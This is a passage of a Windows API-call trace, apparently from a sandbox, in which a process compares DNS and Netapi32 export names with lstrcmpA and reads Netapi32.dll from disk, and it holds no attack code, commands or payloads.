[0178.085] lstrcmpA (lpString1="DnsAsyncRegisterTerm", lpString2="DnsAcquireContextHandle_W") returned 1 [0178.085] lstrcmpA (lpString1="DnsAsyncRegisterTerm", lpString2="DnsAllocateRecord") returned 1 [0178.085] lstrcmpA (lpString1="DnsAsyncRegisterTerm", lpString2="DnsApiAlloc") returned 1 [0178.085] lstrcmpA (lpString1="DnsAsyncRegisterTerm", lpString2="DnsApiAllocZero") returned 1 [0178.085] lstrcmpA (lpString1="DnsAsyncRegisterTerm", lpString2="DnsApiFree") returned 1 [0178.085] lstrcmpA (lpString1="DnsAsyncRegisterTerm", lpString2="DnsApiHeapReset") returned 1 [0178.085] lstrcmpA (lpString1="DnsAsyncRegisterTerm", lpString2="DnsApiRealloc") returned 1 [0178.085] lstrcmpA (lpString1="DnsAsyncRegisterTerm", lpString2="DnsApiSetDebugGlobals") returned 1 [0178.085] lstrcmpA (lpString1="DnsAsyncRegisterTerm", lpString2="DnsAsyncRegisterHostAddrs") returned 1 [0178.085] lstrcmpA (lpString1="DnsAsyncRegisterTerm", lpString2="DnsAsyncRegisterInit") returned 1 [0178.085] lstrcmpA (lpString1="DnsAsyncRegisterTerm", lpString2="DnsAsyncRegisterTerm") returned 0 [0178.085] lstrcmpA (lpString1="DnsCancelQuery", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 1 [0178.085] lstrcmpA (lpString1="DnsCancelQuery", lpString2="AdaptiveTimeout_ResetAdaptiveTimeout") returned 1 [0178.085] lstrcmpA (lpString1="DnsCancelQuery", lpString2="AddRefQueryBlobEx") returned 1 [0178.085] lstrcmpA (lpString1="DnsCancelQuery", lpString2="BreakRecordsIntoBlob") returned 1 [0178.085] lstrcmpA (lpString1="DnsCancelQuery", lpString2="Coalesce_UpdateNetVersion") returned 1 [0178.085] lstrcmpA (lpString1="DnsCancelQuery", lpString2="CombineRecordsInBlob") returned 1 [0178.085] lstrcmpA (lpString1="DnsCancelQuery", lpString2="DeRefQueryBlobEx") returned 1 [0178.086] lstrcmpA (lpString1="DnsCancelQuery", lpString2="DelaySortDAServerlist") returned 1 [0178.086] lstrcmpA (lpString1="DnsCancelQuery", lpString2="DnsAcquireContextHandle_A") returned 1 [0178.086] lstrcmpA (lpString1="DnsCancelQuery", lpString2="DnsAcquireContextHandle_W") returned 1 [0178.086] lstrcmpA (lpString1="DnsCancelQuery", lpString2="DnsAllocateRecord") returned 1 [0178.086] lstrcmpA (lpString1="DnsCancelQuery", lpString2="DnsApiAlloc") returned 1 [0178.086] lstrcmpA (lpString1="DnsCancelQuery", lpString2="DnsApiAllocZero") returned 1 [0178.086] lstrcmpA (lpString1="DnsCancelQuery", lpString2="DnsApiFree") returned 1 [0178.086] lstrcmpA (lpString1="DnsCancelQuery", lpString2="DnsApiHeapReset") returned 1 [0178.086] lstrcmpA (lpString1="DnsCancelQuery", lpString2="DnsApiRealloc") returned 1 [0178.086] lstrcmpA (lpString1="DnsCancelQuery", lpString2="DnsApiSetDebugGlobals") returned 1 [0178.086] lstrcmpA (lpString1="DnsCancelQuery", lpString2="DnsAsyncRegisterHostAddrs") returned 1 [0178.086] lstrcmpA (lpString1="DnsCancelQuery", lpString2="DnsAsyncRegisterInit") returned 1 [0178.086] lstrcmpA (lpString1="DnsCancelQuery", lpString2="DnsAsyncRegisterTerm") returned 1 [0178.086] lstrcmpA (lpString1="DnsCancelQuery", lpString2="DnsCancelQuery") returned 0 [0178.086] lstrcmpA (lpString1="DnsCopyStringEx", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 1 [0178.086] lstrcmpA (lpString1="DnsCopyStringEx", lpString2="AdaptiveTimeout_ResetAdaptiveTimeout") returned 1 [0178.086] lstrcmpA (lpString1="DnsCopyStringEx", lpString2="AddRefQueryBlobEx") returned 1 [0178.086] lstrcmpA (lpString1="DnsCopyStringEx", lpString2="BreakRecordsIntoBlob") returned 1 [0178.086] lstrcmpA (lpString1="DnsCopyStringEx", lpString2="Coalesce_UpdateNetVersion") returned 1 [0178.086] lstrcmpA (lpString1="DnsCopyStringEx", lpString2="CombineRecordsInBlob") returned 1 [0178.087] lstrcmpA (lpString1="DnsCopyStringEx", lpString2="DeRefQueryBlobEx") returned 1 [0178.087] lstrcmpA (lpString1="DnsCopyStringEx", lpString2="DelaySortDAServerlist") returned 1 [0178.087] lstrcmpA (lpString1="DnsCopyStringEx", lpString2="DnsAcquireContextHandle_A") returned 1 [0178.087] lstrcmpA (lpString1="DnsCopyStringEx", lpString2="DnsAcquireContextHandle_W") returned 1 [0178.087] lstrcmpA (lpString1="DnsCopyStringEx", lpString2="DnsAllocateRecord") returned 1 [0178.087] lstrcmpA (lpString1="DnsCopyStringEx", lpString2="DnsApiAlloc") returned 1 [0178.087] lstrcmpA (lpString1="DnsCopyStringEx", lpString2="DnsApiAllocZero") returned 1 [0178.087] lstrcmpA (lpString1="DnsCopyStringEx", lpString2="DnsApiFree") returned 1 [0178.087] lstrcmpA (lpString1="DnsCopyStringEx", lpString2="DnsApiHeapReset") returned 1 [0178.087] lstrcmpA (lpString1="DnsCopyStringEx", lpString2="DnsApiRealloc") returned 1 [0178.087] lstrcmpA (lpString1="DnsCopyStringEx", lpString2="DnsApiSetDebugGlobals") returned 1 [0178.087] lstrcmpA (lpString1="DnsCopyStringEx", lpString2="DnsAsyncRegisterHostAddrs") returned 1 [0178.224] GetProcessHeap () returned 0x580000 [0178.225] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x3a2d010 | out: hHeap=0x580000) returned 1 [0178.225] GetProcessHeap () returned 0x580000 [0178.225] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x10) returned 0x5990a0 [0178.225] LoadLibraryA (lpLibFileName="Netapi32.dll") returned 0x7ffc5cb30000 [0178.228] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetModuleFileNameA") returned 0x7ffc5ecf6e30 [0178.228] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CreateFileA") returned 0x7ffc5ecfd8a0 [0178.229] GetModuleFileNameA (in: hModule=0x7ffc5cb30000, lpFilename=0x14f5d0, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\Netapi32.dll" (normalized: "c:\\windows\\system32\\netapi32.dll")) returned 0x20 [0178.230] CreateFileA (lpFileName="C:\\Windows\\system32\\Netapi32.dll" (normalized: "c:\\windows\\system32\\netapi32.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x17c [0178.230] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetFileSizeEx") returned 0x7ffc5ecfdaa0 [0178.230] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CloseHandle") returned 0x7ffc5ecfd650 [0178.230] GetFileSizeEx (in: hFile=0x17c, lpFileSize=0x14f5b0 | out: lpFileSize=0x14f5b0*=80640) returned 1 [0178.230] GetProcessHeap () returned 0x580000 [0178.230] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x13b00) returned 0x2cf5030 [0178.230] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="ReadFile") returned 0x7ffc5ecfdbd0 [0178.230] ReadFile (in: hFile=0x17c, lpBuffer=0x2cf5030, nNumberOfBytesToRead=0x13b00, lpNumberOfBytesRead=0x14f5a4, lpOverlapped=0x0 | out: lpBuffer=0x2cf5030*, lpNumberOfBytesRead=0x14f5a4*=0x13b00, lpOverlapped=0x0) returned 1 [0178.231] CloseHandle (hObject=0x17c) returned 1 [0178.231] lstrcmpA (lpString1="NetAccessAdd", lpString2="DavAddConnection") returned 1 [0178.231] lstrcmpA (lpString1="NetAccessAdd", lpString2="DavDeleteConnection") returned 1 [0178.231] lstrcmpA (lpString1="NetAccessAdd", lpString2="DavFlushFile") returned 1 [0178.231] lstrcmpA (lpString1="NetAccessAdd", lpString2="DavGetExtendedError") returned 1 [0178.231] lstrcmpA (lpString1="NetAccessAdd", lpString2="DavGetHTTPFromUNCPath") returned 1 [0178.231] lstrcmpA (lpString1="NetAccessAdd", lpString2="DavGetUNCFromHTTPPath") returned 1 [0178.231] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsAddressToSiteNamesA") returned 1 [0178.231] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsAddressToSiteNamesExA") returned 1 [0178.231] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsAddressToSiteNamesExW") returned 1 [0178.231] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsAddressToSiteNamesW") returned 1 [0178.231] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsDeregisterDnsHostRecordsA") returned 1 [0178.231] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsDeregisterDnsHostRecordsW") returned 1 [0178.231] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsEnumerateDomainTrustsA") returned 1 [0178.231] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsEnumerateDomainTrustsW") returned 1 [0178.232] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsGetDcCloseW") returned 1 [0178.232] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsGetDcNameA") returned 1 [0178.232] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsGetDcNameW") returned 1 [0178.232] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsGetDcNameWithAccountA") returned 1 [0178.232] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsGetDcNameWithAccountW") returned 1 [0178.232] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsGetDcNextA") returned 1 [0178.232] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsGetDcNextW") returned 1 [0178.232] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsGetDcOpenA") returned 1 [0178.232] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsGetDcOpenW") returned 1 [0178.232] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsGetDcSiteCoverageA") returned 1 [0178.232] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsGetDcSiteCoverageW") returned 1 [0178.232] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsGetForestTrustInformationW") returned 1 [0178.232] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsGetSiteNameA") returned 1 [0178.232] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsGetSiteNameW") returned 1 [0178.232] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsMergeForestTrustInformationW") returned 1 [0178.232] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsRoleFreeMemory") returned 1 [0178.232] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsRoleGetPrimaryDomainInformation") returned 1 [0178.232] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsValidateSubnetNameA") returned 1 [0178.232] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsValidateSubnetNameW") returned 1 [0178.232] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_BrowserDebugCall") returned 1 [0178.232] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_BrowserDebugTrace") returned 1 [0178.232] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_BrowserQueryEmulatedDomains") returned 1 [0178.232] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_BrowserQueryOtherDomains") returned 1 [0178.232] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_BrowserQueryStatistics") returned 1 [0178.232] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_BrowserResetNetlogonState") returned 1 [0178.232] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_BrowserResetStatistics") returned 1 [0178.232] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_BrowserServerEnum") returned 1 [0178.232] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_BrowserSetNetlogonState") returned 1 [0178.232] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_DsUpdateReadOnlyServerDnsRecords") returned 1 [0178.232] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetAccountDeltas") returned 1 [0178.232] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetAccountSync") returned 1 [0178.232] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetChainSetClientAttributes") returned 1 [0178.232] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetChainSetClientAttributes2") returned 1 [0178.232] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetDatabaseDeltas") returned 1 [0178.232] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetDatabaseRedo") returned 1 [0178.232] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetDatabaseSync") returned 1 [0178.232] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetDatabaseSync2") returned 1 [0178.232] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetDfsGetVersion") returned 1 [0178.233] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetDfsIsThisADomainName") returned 1 [0178.233] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetGetDCList") returned 1 [0178.233] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetGetForestTrustInformation") returned 1 [0178.233] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetLogonControl") returned 1 [0178.233] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetLogonControl2") returned 1 [0178.233] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetLogonGetDomainInfo") returned 1 [0178.233] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetLogonSamLogoff") returned 1 [0178.233] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetLogonSamLogon") returned 1 [0178.233] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetLogonSamLogonEx") returned 1 [0178.233] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetLogonSamLogonWithFlags") returned 1 [0178.233] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetLogonSendToSam") returned 1 [0178.233] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetLogonUasLogoff") returned 1 [0178.233] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetLogonUasLogon") returned 1 [0178.233] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetServerAuthenticate") returned 1 [0178.233] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetServerAuthenticate2") returned 1 [0178.233] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetServerAuthenticate3") returned 1 [0178.233] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetServerGetTrustInfo") returned 1 [0178.233] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetServerPasswordGet") returned 1 [0178.233] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetServerPasswordSet") returned 1 [0178.233] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetServerPasswordSet2") returned 1 [0178.233] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetServerReqChallenge") returned 1 [0178.233] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetServerSetServiceBits") returned 1 [0178.233] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetServerSetServiceBitsEx") returned 1 [0178.233] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetServerTrustPasswordsGet") returned 1 [0178.233] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetlogonComputeClientDigest") returned 1 [0178.233] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetlogonComputeServerDigest") returned 1 [0178.233] lstrcmpA (lpString1="NetAccessAdd", lpString2="NetAccessAdd") returned 0 [0178.233] lstrcmpA (lpString1="NetAccessDel", lpString2="DavAddConnection") returned 1 [0178.234] lstrcmpA (lpString1="NetAccessDel", lpString2="DavDeleteConnection") returned 1 [0178.234] lstrcmpA (lpString1="NetAccessDel", lpString2="DavFlushFile") returned 1 [0178.234] lstrcmpA (lpString1="NetAccessDel", lpString2="DavGetExtendedError") returned 1 [0178.234] lstrcmpA (lpString1="NetAccessDel", lpString2="DavGetHTTPFromUNCPath") returned 1 [0178.234] lstrcmpA (lpString1="NetAccessDel", lpString2="DavGetUNCFromHTTPPath") returned 1 [0178.234] lstrcmpA (lpString1="NetAccessDel", lpString2="DsAddressToSiteNamesA") returned 1 [0178.234] lstrcmpA (lpString1="NetAccessDel", lpString2="DsAddressToSiteNamesExA") returned 1 [0178.234] lstrcmpA (lpString1="NetAccessDel", lpString2="DsAddressToSiteNamesExW") returned 1 [0178.234] lstrcmpA (lpString1="NetAccessDel", lpString2="DsAddressToSiteNamesW") returned 1 [0178.234] lstrcmpA (lpString1="NetAccessDel", lpString2="DsDeregisterDnsHostRecordsA") returned 1 [0178.234] lstrcmpA (lpString1="NetAccessDel", lpString2="DsDeregisterDnsHostRecordsW") returned 1 [0178.234] lstrcmpA (lpString1="NetAccessDel", lpString2="DsEnumerateDomainTrustsA") returned 1 [0178.234] lstrcmpA (lpString1="NetAccessDel", lpString2="DsEnumerateDomainTrustsW") returned 1 [0178.234] lstrcmpA (lpString1="NetAccessDel", lpString2="DsGetDcCloseW") returned 1 [0178.234] lstrcmpA (lpString1="NetAccessDel", lpString2="DsGetDcNameA") returned 1 [0178.234] lstrcmpA (lpString1="NetAccessDel", lpString2="DsGetDcNameW") returned 1 [0178.234] lstrcmpA (lpString1="NetAccessDel", lpString2="DsGetDcNameWithAccountA") returned 1 [0178.234] lstrcmpA (lpString1="NetAccessDel", lpString2="DsGetDcNameWithAccountW") returned 1 [0178.234] lstrcmpA (lpString1="NetAccessDel", lpString2="DsGetDcNextA") returned 1 [0178.234] lstrcmpA (lpString1="NetAccessDel", lpString2="DsGetDcNextW") returned 1 [0178.234] lstrcmpA (lpString1="NetAccessDel", lpString2="DsGetDcOpenA") returned 1 [0178.234] lstrcmpA (lpString1="NetAccessDel", lpString2="DsGetDcOpenW") returned 1 [0178.234] lstrcmpA (lpString1="NetAccessDel", lpString2="DsGetDcSiteCoverageA") returned 1 [0178.234] lstrcmpA (lpString1="NetAccessDel", lpString2="DsGetDcSiteCoverageW") returned 1 [0178.234] lstrcmpA (lpString1="NetAccessDel", lpString2="DsGetForestTrustInformationW") returned 1 [0178.234] lstrcmpA (lpString1="NetAccessDel", lpString2="DsGetSiteNameA") returned 1 [0178.234] lstrcmpA (lpString1="NetAccessDel", lpString2="DsGetSiteNameW") returned 1 [0178.234] lstrcmpA (lpString1="NetAccessDel", lpString2="DsMergeForestTrustInformationW") returned 1 [0178.234] lstrcmpA (lpString1="NetAccessDel", lpString2="DsRoleFreeMemory") returned 1 [0178.234] lstrcmpA (lpString1="NetAccessDel", lpString2="DsRoleGetPrimaryDomainInformation") returned 1 [0178.234] lstrcmpA (lpString1="NetAccessDel", lpString2="DsValidateSubnetNameA") returned 1 [0178.234] lstrcmpA (lpString1="NetAccessDel", lpString2="DsValidateSubnetNameW") returned 1 [0178.234] lstrcmpA (lpString1="NetAccessDel", lpString2="I_BrowserDebugCall") returned 1 [0178.234] lstrcmpA (lpString1="NetAccessDel", lpString2="I_BrowserDebugTrace") returned 1 [0178.235] lstrcmpA (lpString1="NetAccessDel", lpString2="I_BrowserQueryEmulatedDomains") returned 1 [0178.235] lstrcmpA (lpString1="NetAccessDel", lpString2="I_BrowserQueryOtherDomains") returned 1 [0178.235] lstrcmpA (lpString1="NetAccessDel", lpString2="I_BrowserQueryStatistics") returned 1 [0178.235] lstrcmpA (lpString1="NetAccessDel", lpString2="I_BrowserResetNetlogonState") returned 1 [0178.235] lstrcmpA (lpString1="NetAccessDel", lpString2="I_BrowserResetStatistics") returned 1 [0178.235] lstrcmpA (lpString1="NetAccessDel", lpString2="I_BrowserServerEnum") returned 1 [0178.235] lstrcmpA (lpString1="NetAccessDel", lpString2="I_BrowserSetNetlogonState") returned 1 [0178.235] lstrcmpA (lpString1="NetAccessDel", lpString2="I_DsUpdateReadOnlyServerDnsRecords") returned 1 [0178.235] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetAccountDeltas") returned 1 [0178.235] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetAccountSync") returned 1 [0178.235] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetChainSetClientAttributes") returned 1 [0178.235] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetChainSetClientAttributes2") returned 1 [0178.235] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetDatabaseDeltas") returned 1 [0178.235] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetDatabaseRedo") returned 1 [0178.235] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetDatabaseSync") returned 1 [0178.235] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetDatabaseSync2") returned 1 [0178.235] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetDfsGetVersion") returned 1 [0178.235] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetDfsIsThisADomainName") returned 1 [0178.235] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetGetDCList") returned 1 [0178.235] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetGetForestTrustInformation") returned 1 [0178.236] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetLogonControl") returned 1 [0178.236] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetLogonControl2") returned 1 [0178.236] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetLogonGetDomainInfo") returned 1 [0178.236] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetLogonSamLogoff") returned 1 [0178.236] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetLogonSamLogon") returned 1 [0178.236] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetLogonSamLogonEx") returned 1 [0178.236] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetLogonSamLogonWithFlags") returned 1 [0178.236] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetLogonSendToSam") returned 1 [0178.236] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetLogonUasLogoff") returned 1 [0178.236] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetLogonUasLogon") returned 1 [0178.236] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetServerAuthenticate") returned 1 [0178.236] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetServerAuthenticate2") returned 1 [0178.236] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetServerAuthenticate3") returned 1 [0178.236] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetServerGetTrustInfo") returned 1 [0178.236] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetServerPasswordGet") returned 1 [0178.236] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetServerPasswordSet") returned 1 [0178.236] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetServerPasswordSet2") returned 1 [0178.236] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetServerReqChallenge") returned 1 [0178.236] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetServerSetServiceBits") returned 1 [0178.236] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetServerSetServiceBitsEx") returned 1 [0178.236] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetServerTrustPasswordsGet") returned 1 [0178.236] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetlogonComputeClientDigest") returned 1 [0178.236] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetlogonComputeServerDigest") returned 1 [0178.236] lstrcmpA (lpString1="NetAccessDel", lpString2="NetAccessAdd") returned 1 [0178.236] lstrcmpA (lpString1="NetAccessDel", lpString2="NetAccessDel") returned 0 [0178.236] lstrcmpA (lpString1="NetAccessEnum", lpString2="DavAddConnection") returned 1 [0178.236] lstrcmpA (lpString1="NetAccessEnum", lpString2="DavDeleteConnection") returned 1 [0178.236] lstrcmpA (lpString1="NetAccessEnum", lpString2="DavFlushFile") returned 1 [0178.236] lstrcmpA (lpString1="NetAccessEnum", lpString2="DavGetExtendedError") returned 1 [0178.236] lstrcmpA (lpString1="NetAccessEnum", lpString2="DavGetHTTPFromUNCPath") returned 1 [0178.236] lstrcmpA (lpString1="NetAccessEnum", lpString2="DavGetUNCFromHTTPPath") returned 1 [0178.236] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsAddressToSiteNamesA") returned 1 [0178.236] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsAddressToSiteNamesExA") returned 1 [0178.236] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsAddressToSiteNamesExW") returned 1 [0178.236] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsAddressToSiteNamesW") returned 1 [0178.237] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsDeregisterDnsHostRecordsA") returned 1 [0178.237] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsDeregisterDnsHostRecordsW") returned 1 [0178.237] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsEnumerateDomainTrustsA") returned 1 [0178.237] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsEnumerateDomainTrustsW") returned 1 [0178.237] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsGetDcCloseW") returned 1 [0178.237] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsGetDcNameA") returned 1 [0178.237] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsGetDcNameW") returned 1 [0178.237] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsGetDcNameWithAccountA") returned 1 [0178.237] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsGetDcNameWithAccountW") returned 1 [0178.237] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsGetDcNextA") returned 1 [0178.237] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsGetDcNextW") returned 1 [0178.237] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsGetDcOpenA") returned 1 [0178.237] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsGetDcOpenW") returned 1 [0178.237] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsGetDcSiteCoverageA") returned 1 [0178.237] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsGetDcSiteCoverageW") returned 1 [0178.237] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsGetForestTrustInformationW") returned 1 [0178.237] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsGetSiteNameA") returned 1 [0178.237] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsGetSiteNameW") returned 1 [0178.237] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsMergeForestTrustInformationW") returned 1 [0178.237] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsRoleFreeMemory") returned 1 [0178.237] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsRoleGetPrimaryDomainInformation") returned 1 [0178.237] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsValidateSubnetNameA") returned 1 [0178.237] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsValidateSubnetNameW") returned 1 [0178.237] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_BrowserDebugCall") returned 1 [0178.237] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_BrowserDebugTrace") returned 1 [0178.237] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_BrowserQueryEmulatedDomains") returned 1 [0178.237] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_BrowserQueryOtherDomains") returned 1 [0178.237] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_BrowserQueryStatistics") returned 1 [0178.237] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_BrowserResetNetlogonState") returned 1 [0178.238] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_BrowserResetStatistics") returned 1 [0178.238] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_BrowserServerEnum") returned 1 [0178.238] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_BrowserSetNetlogonState") returned 1 [0178.238] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_DsUpdateReadOnlyServerDnsRecords") returned 1 [0178.238] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetAccountDeltas") returned 1 [0178.238] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetAccountSync") returned 1 [0178.238] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetChainSetClientAttributes") returned 1 [0178.238] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetChainSetClientAttributes2") returned 1 [0178.238] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetDatabaseDeltas") returned 1 [0178.238] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetDatabaseRedo") returned 1 [0178.238] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetDatabaseSync") returned 1 [0178.238] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetDatabaseSync2") returned 1 [0178.238] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetDfsGetVersion") returned 1 [0178.238] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetDfsIsThisADomainName") returned 1 [0178.238] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetGetDCList") returned 1 [0178.238] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetGetForestTrustInformation") returned 1 [0178.238] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetLogonControl") returned 1 [0178.238] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetLogonControl2") returned 1 [0178.238] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetLogonGetDomainInfo") returned 1 [0178.238] lstrcmpA (lpString1="NetAccessEnum", 